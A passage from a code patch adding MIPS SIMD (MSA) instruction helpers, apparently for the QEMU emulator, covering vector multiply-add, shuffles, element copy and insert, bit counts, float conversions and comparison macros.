(DF_BITS(df) - 1); + + return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; +} + +static inline int64_t msa_msubr_q_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t q_prod, q_ret; + + int64_t q_max = DF_MAX_INT(df); + int64_t q_min = DF_MIN_INT(df); + int64_t r_bit = (int64_t)1 << (DF_BITS(df) - 2); + + q_prod = arg1 * arg2; + q_ret = ((dest << (DF_BITS(df) - 1)) - q_prod + r_bit) >> (DF_BITS(df) - 1); + + return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; +} + +#define MSA_TEROP_DF(func) \ +void helper_msa_ ## func ## _df(CPUMIPSState *env, uint32_t df, uint32_t wd, \ + uint32_t ws, uint32_t wt) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pwd->b[i], pws->b[i], \ + pwt->b[i]); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pwd->h[i], pws->h[i], \ + pwt->h[i]); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pwd->w[i], pws->w[i], \ + pwt->w[i]); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pwd->d[i], pws->d[i], \ + pwt->d[i]); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_TEROP_DF(maddv) +MSA_TEROP_DF(msubv) +MSA_TEROP_DF(dpadd_s) +MSA_TEROP_DF(dpadd_u) +MSA_TEROP_DF(dpsub_s) +MSA_TEROP_DF(dpsub_u) +MSA_TEROP_DF(binsl) +MSA_TEROP_DF(binsr) +MSA_TEROP_DF(madd_q) +MSA_TEROP_DF(msub_q) +MSA_TEROP_DF(maddr_q) +MSA_TEROP_DF(msubr_q) +#undef MSA_TEROP_DF + +static inline void msa_splat_df(uint32_t df, wr_t *pwd, + wr_t *pws, target_ulong rt) +{ + uint32_t n = rt % DF_ELEMENTS(df); + uint32_t i; + + switch (df) { + case DF_BYTE: + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { + pwd->b[i] = pws->b[n]; + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + pwd->h[i] = pws->h[n]; + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + pwd->w[i] = pws->w[n]; + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + pwd->d[i] = pws->d[n]; + } + break; + default: + assert(0); + } +} + +void helper_msa_splat_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t rt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + msa_splat_df(df, pwd, pws, env->active_tc.gpr[rt]); +} + +#define MSA_DO_B MSA_DO(b) +#define MSA_DO_H MSA_DO(h) +#define MSA_DO_W MSA_DO(w) +#define MSA_DO_D MSA_DO(d) + +#define MSA_LOOP_B MSA_LOOP(B) +#define MSA_LOOP_H MSA_LOOP(H) +#define MSA_LOOP_W MSA_LOOP(W) +#define MSA_LOOP_D MSA_LOOP(D) + +#define MSA_LOOP_COND_B MSA_LOOP_COND(DF_BYTE) +#define MSA_LOOP_COND_H MSA_LOOP_COND(DF_HALF) +#define MSA_LOOP_COND_W MSA_LOOP_COND(DF_WORD) +#define MSA_LOOP_COND_D MSA_LOOP_COND(DF_DOUBLE) + +#define MSA_LOOP(DF) \ + for (i = 0; i < (MSA_LOOP_COND_ ## DF) ; i++) { \ + MSA_DO_ ## DF \ + } + +#define MSA_FN_DF(FUNC) \ +void helper_msa_##FUNC(CPUMIPSState *env, uint32_t df, uint32_t wd, \ + uint32_t ws, uint32_t wt) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ + wr_t wx, *pwx = &wx; \ + uint32_t i; \ + switch (df) { \ + case DF_BYTE: \ + MSA_LOOP_B \ + break; \ + case DF_HALF: \ + MSA_LOOP_H \ + break; \ + case DF_WORD: \ + MSA_LOOP_W \ + break; \ + case DF_DOUBLE: \ + MSA_LOOP_D \ + break; \ + default: \ + assert(0); \ + } \ + msa_move_v(pwd, pwx); \ +} + +#define MSA_LOOP_COND(DF) \ + (DF_ELEMENTS(DF) / 2) + +#define Rb(pwr, i) (pwr->b[i]) +#define Lb(pwr, i) (pwr->b[i + DF_ELEMENTS(DF_BYTE)/2]) +#define Rh(pwr, i) (pwr->h[i]) +#define Lh(pwr, i) (pwr->h[i + DF_ELEMENTS(DF_HALF)/2]) +#define Rw(pwr, i) (pwr->w[i]) +#define Lw(pwr, i) (pwr->w[i + DF_ELEMENTS(DF_WORD)/2]) +#define Rd(pwr, i) (pwr->d[i]) +#define Ld(pwr, i) (pwr->d[i + DF_ELEMENTS(DF_DOUBLE)/2]) + +#define MSA_DO(DF) \ + do { \ + R##DF(pwx, i) = pwt->DF[2*i]; \ + L##DF(pwx, i) = pws->DF[2*i]; \ + } while (0); +MSA_FN_DF(pckev_df) +#undef MSA_DO + +#define MSA_DO(DF) \ + do { \ + R##DF(pwx, i) = pwt->DF[2*i+1]; \ + L##DF(pwx, i) = pws->DF[2*i+1]; \ + } while (0); +MSA_FN_DF(pckod_df) +#undef MSA_DO + +#define MSA_DO(DF) \ + do { \ + pwx->DF[2*i] = L##DF(pwt, i); \ + pwx->DF[2*i+1] = L##DF(pws, i); \ + } while (0); +MSA_FN_DF(ilvl_df) +#undef MSA_DO + +#define MSA_DO(DF) \ + do { \ + pwx->DF[2*i] = R##DF(pwt, i); \ + pwx->DF[2*i+1] = R##DF(pws, i); \ + } while (0); +MSA_FN_DF(ilvr_df) +#undef MSA_DO + +#define MSA_DO(DF) \ + do { \ + pwx->DF[2*i] = pwt->DF[2*i]; \ + pwx->DF[2*i+1] = pws->DF[2*i]; \ + } while (0); +MSA_FN_DF(ilvev_df) +#undef MSA_DO + +#define MSA_DO(DF) \ + do { \ + pwx->DF[2*i] = pwt->DF[2*i+1]; \ + pwx->DF[2*i+1] = pws->DF[2*i+1]; \ + } while (0); +MSA_FN_DF(ilvod_df) +#undef MSA_DO +#undef MSA_LOOP_COND + +#define MSA_LOOP_COND(DF) \ + (DF_ELEMENTS(DF)) + +#define MSA_DO(DF) \ + do { \ + uint32_t n = DF_ELEMENTS(df); \ + uint32_t k = (pwd->DF[i] & 0x3f) % (2 * n); \ + pwx->DF[i] = \ + (pwd->DF[i] & 0xc0) ? 0 : k < n ? pwt->DF[k] : pws->DF[k - n]; \ + } while (0); +MSA_FN_DF(vshf_df) +#undef MSA_DO +#undef MSA_LOOP_COND +#undef MSA_FN_DF + +void helper_msa_sldi_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t n) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + msa_sld_df(df, pwd, pws, n); +} + +void helper_msa_splati_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t n) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + msa_splat_df(df, pwd, pws, n); +} + +void helper_msa_copy_s_df(CPUMIPSState *env, uint32_t df, uint32_t rd, + uint32_t ws, uint32_t n) +{ + n %= DF_ELEMENTS(df); + + switch (df) { + case DF_BYTE: + env->active_tc.gpr[rd] = (int8_t)env->active_fpu.fpr[ws].wr.b[n]; + break; + case DF_HALF: + env->active_tc.gpr[rd] = (int16_t)env->active_fpu.fpr[ws].wr.h[n]; + break; + case DF_WORD: + env->active_tc.gpr[rd] = (int32_t)env->active_fpu.fpr[ws].wr.w[n]; + break; +#ifdef TARGET_MIPS64 + case DF_DOUBLE: + env->active_tc.gpr[rd] = (int64_t)env->active_fpu.fpr[ws].wr.d[n]; + break; +#endif + default: + assert(0); + } +} + +void helper_msa_copy_u_df(CPUMIPSState *env, uint32_t df, uint32_t rd, + uint32_t ws, uint32_t n) +{ + n %= DF_ELEMENTS(df); + + switch (df) { + case DF_BYTE: + env->active_tc.gpr[rd] = (uint8_t)env->active_fpu.fpr[ws].wr.b[n]; + break; + case DF_HALF: + env->active_tc.gpr[rd] = (uint16_t)env->active_fpu.fpr[ws].wr.h[n]; + break; + case DF_WORD: + env->active_tc.gpr[rd] = (uint32_t)env->active_fpu.fpr[ws].wr.w[n]; + break; +#ifdef TARGET_MIPS64 + case DF_DOUBLE: + env->active_tc.gpr[rd] = (uint64_t)env->active_fpu.fpr[ws].wr.d[n]; + break; +#endif + default: + assert(0); + } +} + +void helper_msa_insert_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t rs_num, uint32_t n) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + target_ulong rs = env->active_tc.gpr[rs_num]; + + switch (df) { + case DF_BYTE: + pwd->b[n] = (int8_t)rs; + break; + case DF_HALF: + pwd->h[n] = (int16_t)rs; + break; + case DF_WORD: + pwd->w[n] = (int32_t)rs; + break; + case DF_DOUBLE: + pwd->d[n] = (int64_t)rs; + break; + default: + assert(0); + } +} + +void helper_msa_insve_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t n) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + switch (df) { + case DF_BYTE: + pwd->b[n] = (int8_t)pws->b[0]; + break; + case DF_HALF: + pwd->h[n] = (int16_t)pws->h[0]; + break; + case DF_WORD: + pwd->w[n] = (int32_t)pws->w[0]; + break; + case DF_DOUBLE: + pwd->d[n] = (int64_t)pws->d[0]; + break; + default: + assert(0); + } +} + +void helper_msa_ctcmsa(CPUMIPSState *env, target_ulong elm, uint32_t cd) +{ + switch (cd) { + case 0: + break; + case 1: + env->active_tc.msacsr = (int32_t)elm & MSACSR_MASK; + /* set float_status rounding mode */ + set_float_rounding_mode( + ieee_rm[(env->active_tc.msacsr & MSACSR_RM_MASK) >> MSACSR_RM], + &env->active_tc.msa_fp_status); + /* set float_status flush modes */ + set_flush_to_zero( + (env->active_tc.msacsr & MSACSR_FS_MASK) != 0 ? 1 : 0, + &env->active_tc.msa_fp_status); + set_flush_inputs_to_zero( + (env->active_tc.msacsr & MSACSR_FS_MASK) != 0 ? 1 : 0, + &env->active_tc.msa_fp_status); + /* check exception */ + if ((GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED) + & GET_FP_CAUSE(env->active_tc.msacsr)) { + helper_raise_exception(env, EXCP_MSAFPE); + } + break; + } +} + +target_ulong helper_msa_cfcmsa(CPUMIPSState *env, uint32_t cs) +{ + switch (cs) { + case 0: + return env->msair; + case 1: + return env->active_tc.msacsr & MSACSR_MASK; + } + return 0; +} + +void helper_msa_move_v(CPUMIPSState *env, uint32_t wd, uint32_t ws) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + msa_move_v(pwd, pws); +} + +static inline int64_t msa_pcnt_df(uint32_t df, int64_t arg) +{ + uint64_t x; + + x = UNSIGNED(arg, df); + + x = (x & 0x5555555555555555ULL) + ((x >> 1) & 0x5555555555555555ULL); + x = (x & 0x3333333333333333ULL) + ((x >> 2) & 0x3333333333333333ULL); + x = (x & 0x0F0F0F0F0F0F0F0FULL) + ((x >> 4) & 0x0F0F0F0F0F0F0F0FULL); + x = (x & 0x00FF00FF00FF00FFULL) + ((x >> 8) & 0x00FF00FF00FF00FFULL); + x = (x & 0x0000FFFF0000FFFFULL) + ((x >> 16) & 0x0000FFFF0000FFFFULL); + x = (x & 0x00000000FFFFFFFFULL) + ((x >> 32)); + + return x; +} + +static inline int64_t msa_nlzc_df(uint32_t df, int64_t arg) +{ + uint64_t x, y; + int n, c; + + x = UNSIGNED(arg, df); + n = DF_BITS(df); + c = DF_BITS(df) / 2; + + do { + y = x >> c; + if (y != 0) { + n = n - c; + x = y; + } + c = c >> 1; + } while (c != 0); + + return n - x; +} + +static inline int64_t msa_nloc_df(uint32_t df, int64_t arg) +{ + return msa_nlzc_df(df, UNSIGNED((~arg), df)); +} + +void helper_msa_fill_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t rs) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + uint32_t i; + + switch (df) { + case DF_BYTE: + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { + pwd->b[i] = (int8_t)env->active_tc.gpr[rs]; + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + pwd->h[i] = (int16_t)env->active_tc.gpr[rs]; + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + pwd->w[i] = (int32_t)env->active_tc.gpr[rs]; + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + pwd->d[i] = (int64_t)env->active_tc.gpr[rs]; + } + break; + default: + assert(0); + } +} + +#define MSA_UNOP_DF(func) \ +void helper_msa_ ## func ## _df(CPUMIPSState *env, uint32_t df, \ + uint32_t wd, uint32_t ws) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pws->b[i]); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pws->h[i]); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pws->w[i]); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pws->d[i]); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_UNOP_DF(nlzc) +MSA_UNOP_DF(nloc) +MSA_UNOP_DF(pcnt) +#undef MSA_UNOP_DF + +#define FLOAT_ONE32 make_float32(0x3f8 << 20) +#define FLOAT_ONE64 make_float64(0x3ffULL << 52) + +#define FLOAT_SNAN16 (float16_default_nan ^ 0x0220) + /* 0x7c20 */ +#define FLOAT_SNAN32 (float32_default_nan ^ 0x00400020) + /* 0x7f800020 */ +#define FLOAT_SNAN64 (float64_default_nan ^ 0x0008000000000020ULL) + /* 0x7ff0000000000020 */ + +static inline void clear_msacsr_cause(CPUMIPSState *env) +{ + SET_FP_CAUSE(env->active_tc.msacsr, 0); +} + +static inline void check_msacsr_cause(CPUMIPSState *env) +{ + if ((GET_FP_CAUSE(env->active_tc.msacsr) & + (GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED)) == 0) { + UPDATE_FP_FLAGS(env->active_tc.msacsr, + GET_FP_CAUSE(env->active_tc.msacsr)); + } else { + helper_raise_exception(env, EXCP_MSAFPE); + } +} + +/* Flush-to-zero use cases for update_msacsr() */ +#define CLEAR_FS_UNDERFLOW 1 +#define CLEAR_IS_INEXACT 2 +#define RECIPROCAL_INEXACT 4 + +static inline int update_msacsr(CPUMIPSState *env, int action, int denormal) +{ + int ieee_ex; + + int c; + int cause; + int enable; + + ieee_ex = get_float_exception_flags(&env->active_tc.msa_fp_status); + + /* QEMU softfloat does not signal all underflow cases */ + if (denormal) { + ieee_ex |= float_flag_underflow; + } + + c = ieee_ex_to_mips(ieee_ex); + enable = GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED; + + /* Set Inexact (I) when flushing inputs to zero */ + if ((ieee_ex & float_flag_input_denormal) && + (env->active_tc.msacsr & MSACSR_FS_MASK) != 0) { + if (action & CLEAR_IS_INEXACT) { + c &= ~FP_INEXACT; + } else { + c |= FP_INEXACT; + } + } + + /* Set Inexact (I) and Underflow (U) when flushing outputs to zero */ + if ((ieee_ex & float_flag_output_denormal) && + (env->active_tc.msacsr & MSACSR_FS_MASK) != 0) { + c |= FP_INEXACT; + if (action & CLEAR_FS_UNDERFLOW) { + c &= ~FP_UNDERFLOW; + } else { + c |= FP_UNDERFLOW; + } + } + + /* Set Inexact (I) when Overflow (O) is not enabled */ + if ((c & FP_OVERFLOW) != 0 && (enable & FP_OVERFLOW) == 0) { + c |= FP_INEXACT; + } + + /* Clear Exact Underflow when Underflow (U) is not enabled */ + if ((c & FP_UNDERFLOW) != 0 && (enable & FP_UNDERFLOW) == 0 && + (c & FP_INEXACT) == 0) { + c &= ~FP_UNDERFLOW; + } + + /* Reciprocal operations set only Inexact when valid and not + divide by zero */ + if ((action & RECIPROCAL_INEXACT) && + (c & (FP_INVALID | FP_DIV0)) == 0) { + c = FP_INEXACT; + } + + cause = c & enable; /* all current enabled exceptions */ + + if (cause == 0) { + /* No enabled exception, update the MSACSR Cause + with all current exceptions */ + SET_FP_CAUSE(env->active_tc.msacsr, + (GET_FP_CAUSE(env->active_tc.msacsr) | c)); + } else { + /* Current exceptions are enabled */ + if ((env->active_tc.msacsr & MSACSR_NX_MASK) == 0) { + /* Exception(s) will trap, update MSACSR Cause + with all enabled exceptions */ + SET_FP_CAUSE(env->active_tc.msacsr, + (GET_FP_CAUSE(env->active_tc.msacsr) | c)); + } + } + + return c; +} + +static inline int get_enabled_exceptions(const CPUMIPSState *env, int c) +{ + int enable = GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED; + return c & enable; +} + +static inline float16 float16_from_float32(int32 a, flag ieee STATUS_PARAM) +{ + float16 f_val; + + f_val = float32_to_float16((float32)a, ieee STATUS_VAR); + f_val = float16_maybe_silence_nan(f_val); + + return a < 0 ? (f_val | (1 << 15)) : f_val; +} + +static inline float32 float32_from_float64(int64 a STATUS_PARAM) +{ + float32 f_val; + + f_val = float64_to_float32((float64)a STATUS_VAR); + f_val = float32_maybe_silence_nan(f_val); + + return a < 0 ? (f_val | (1 << 31)) : f_val; +} + +static inline float32 float32_from_float16(int16_t a, flag ieee STATUS_PARAM) +{ + float32 f_val; + + f_val = float16_to_float32((float16)a, ieee STATUS_VAR); + f_val = float32_maybe_silence_nan(f_val); + + return a < 0 ? (f_val | (1 << 31)) : f_val; +} + +static inline float64 float64_from_float32(int32 a STATUS_PARAM) +{ + float64 f_val; + + f_val = float32_to_float64((float64)a STATUS_VAR); + f_val = float64_maybe_silence_nan(f_val); + + return a < 0 ? (f_val | (1ULL << 63)) : f_val; +} + +static inline float32 float32_from_q16(int16_t a STATUS_PARAM) +{ + float32 f_val; + + /* conversion as integer and scaling */ + f_val = int32_to_float32(a STATUS_VAR); + f_val = float32_scalbn(f_val, -15 STATUS_VAR); + + return f_val; +} + +static inline float64 float64_from_q32(int32 a STATUS_PARAM) +{ + float64 f_val; + + /* conversion as integer and scaling */ + f_val = int32_to_float64(a STATUS_VAR); + f_val = float64_scalbn(f_val, -31 STATUS_VAR); + + return f_val; +} + +static inline int16_t float32_to_q16(float32 a STATUS_PARAM) +{ + int32 q_val; + int32 q_min = 0xffff8000; + int32 q_max = 0x00007fff; + + int ieee_ex; + + if (float32_is_any_nan(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return 0; + } + + /* scaling */ + a = float32_scalbn(a, 15 STATUS_VAR); + + ieee_ex = get_float_exception_flags(status); + set_float_exception_flags(ieee_ex & (~float_flag_underflow) + STATUS_VAR); + + if (ieee_ex & float_flag_overflow) { + float_raise(float_flag_inexact STATUS_VAR); + return (int32)a < 0 ? q_min : q_max; + } + + /* conversion to int */ + q_val = float32_to_int32(a STATUS_VAR); + + ieee_ex = get_float_exception_flags(status); + set_float_exception_flags(ieee_ex & (~float_flag_underflow) + STATUS_VAR); + + if (ieee_ex & float_flag_invalid) { + set_float_exception_flags(ieee_ex & (~float_flag_invalid) + STATUS_VAR); + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int32)a < 0 ? q_min : q_max; + } + + if (q_val < q_min) { + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int16_t)q_min; + } + + if (q_max < q_val) { + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int16_t)q_max; + } + + return (int16_t)q_val; +} + +static inline int32 float64_to_q32(float64 a STATUS_PARAM) +{ + int64 q_val; + int64 q_min = 0xffffffff80000000LL; + int64 q_max = 0x000000007fffffffLL; + + int ieee_ex; + + if (float64_is_any_nan(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return 0; + } + + /* scaling */ + a = float64_scalbn(a, 31 STATUS_VAR); + + ieee_ex = get_float_exception_flags(status); + set_float_exception_flags(ieee_ex & (~float_flag_underflow) + STATUS_VAR); + + if (ieee_ex & float_flag_overflow) { + float_raise(float_flag_inexact STATUS_VAR); + return (int64)a < 0 ? q_min : q_max; + } + + /* conversion to integer */ + q_val = float64_to_int64(a STATUS_VAR); + + ieee_ex = get_float_exception_flags(status); + set_float_exception_flags(ieee_ex & (~float_flag_underflow) + STATUS_VAR); + + if (ieee_ex & float_flag_invalid) { + set_float_exception_flags(ieee_ex & (~float_flag_invalid) + STATUS_VAR); + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int64)a < 0 ? q_min : q_max; + } + + if (q_val < q_min) { + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int32)q_min; + } + + if (q_max < q_val) { + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return (int32)q_max; + } + + return (int32)q_val; +} + +#define MSA_FLOAT_COND(DEST, OP, ARG1, ARG2, BITS, QUIET) \ + do { \ + int c; \ + int64_t cond; \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + if (!QUIET) { \ + cond = float ## BITS ## _ ## OP(ARG1, ARG2, \ + &env->active_tc.msa_fp_status); \ + } else { \ + cond = float ## BITS ## _ ## OP ## _quiet(ARG1, ARG2, \ + &env->active_tc.msa_fp_status); \ + } \ + DEST = cond ? M_MAX_UINT(BITS) : 0; \ + c = update_msacsr(env, CLEAR_IS_INEXACT, 0); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +#define MSA_FLOAT_AF(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, eq, ARG1, ARG2, BITS, QUIET); \ + if ((DEST & M_MAX_UINT(BITS)) == M_MAX_UINT(BITS)) { \ + DEST = 0; \ + } \ + } while (0) + +#define MSA_FLOAT_UEQ(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, eq, ARG1, ARG2, BITS, QUIET); \ + } \ + } while (0) + +#define MSA_FLOAT_NE(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, lt, ARG2, ARG1, BITS, QUIET); \ + } \ + } while (0) + +#define MSA_FLOAT_UNE(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, lt, ARG2, ARG1, BITS, QUIET); \ + } \ + } \ + } while (0) + +#define MSA_FLOAT_ULE(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, le, ARG1, ARG2, BITS, QUIET); \ + } \ + } while (0) + +#define MSA_FLOAT_ULT(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ + } \ + } while (0) + +#define MSA_FLOAT_OR(DEST, ARG1, ARG2, BITS, QUIET) \ + do { \ + MSA_FLOAT_COND(DEST, le, ARG1, ARG2, BITS, QUIET); \ + if (DEST == 0) { \ + MSA_FLOAT_COND(DEST, le, ARG2, ARG1, BITS, QUIET); \ + } \ + } while (0) + +static inline void compare_af(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_AF(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_AF(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_un(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_COND(pwx->w[i], unordered, pws->w[i], pwt->w[i], 32, + quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_COND(pwx->d[i], unordered, pws->d[i], pwt->d[i], 64, + quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_eq(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_COND(pwx->w[i], eq, pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_COND(pwx->d[i], eq, pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_ueq(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UEQ(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UEQ(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_lt(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_COND(pwx->w[i], lt, pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_COND(pwx->d[i], lt, pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_ult(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_ULT(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_ULT(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_le(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case 